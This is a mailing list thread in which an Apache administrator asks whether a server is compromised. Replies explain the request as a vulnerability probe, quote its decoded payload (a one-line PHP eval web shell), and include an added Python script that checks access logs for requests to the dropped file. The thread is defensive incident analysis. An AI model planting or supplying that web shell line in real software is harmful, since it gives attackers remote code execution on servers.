httpd-users mailing list archives

From Mitchell Krog <mitchellk...@gmail.com>
Subject Re: [users@httpd] am i hacked ?
Date Mon, 06 Feb 2017 17:30:48 GMT
I see these types of attack strings all the time on Nginx except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 OK responses
makes you **** yourself. A reason I and many other people have switched.
User support on this list was also nonexistent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson" <kenrbnsn@rbnsn.com> wrote:

>
>
> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
>>> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> <?php eval($_POST[1]);?>
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do
>>> the same thing.
>>>
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
>> belong to root and user wwwrun is not allowed to write there.
>>
>
> What seems to be happening here is that your system is being probed for
> vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes
> that it will not complain and write the string to the file
> webconfig.txt.php which the attacker would then attempt to get to with the
> real hack in the Posted contents. Are there any requests to get to that
> file?
>
> You should make sure you sanitize any input to your index.php and reject
> anything that's not expected.
>
> Ken
>
>
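
The check asked about in the quoted reply ("Are there any requests to get to that file?"), as an added example that is not part of the original thread: it scans access-log lines for the file name from the thread and separates write attempts from follow-up requests to the file itself. The log lines, IP addresses and the `PLACEHOLDER` query value are constructed, and it assumes the Apache common/combined log format with the probe string visible in the request line.

```python
import re
from urllib.parse import unquote, unquote_plus

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
DROPPED = "webconfig.txt.php"  # file name taken from the thread

# Constructed sample lines (documentation IP ranges, placeholder payload).
SAMPLE = [
    '198.51.100.7 - - [06/Feb/2017:10:01:02 +0100] "GET /index.php?a=PLACEHOLDER%2Fwebconfig.txt.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Feb/2017:10:01:05 +0100] "POST /webconfig.txt.php HTTP/1.1" 404 208',
    '192.0.2.10 - - [06/Feb/2017:10:02:00 +0100] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Feb/2017:10:03:00 +0100] "POST /WebConfig.txt.php HTTP/1.1" 200 12',
]

def classify(line):
    """Return (ip, verdict) if the line references the dropped file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parsable access-log line
    ip, _method, target, status = m.groups()
    path, _, query = target.partition("?")
    path = unquote(path).lower()          # undo percent-encoding before matching
    query = unquote_plus(query).lower()
    if DROPPED in path:
        # Someone asked for the file itself. A 2xx means the server found and
        # served it, so the earlier write succeeded; anything else means the
        # file was not there (or access was refused).
        served = status.startswith("2")
        return ip, "dropped-file-served" if served else "dropped-file-absent"
    if DROPPED in query:
        # The file name only appears inside the payload sent to another script.
        # The status code here is that script's response, not proof of a write.
        return ip, "write-attempt"
    return None

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE):
        print(f"{ip:15} {verdict}")
```

A `dropped-file-served` hit is the one that warrants incident response; `write-attempt` followed only by `dropped-file-absent` matches the situation described in the thread, where the file was never created.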
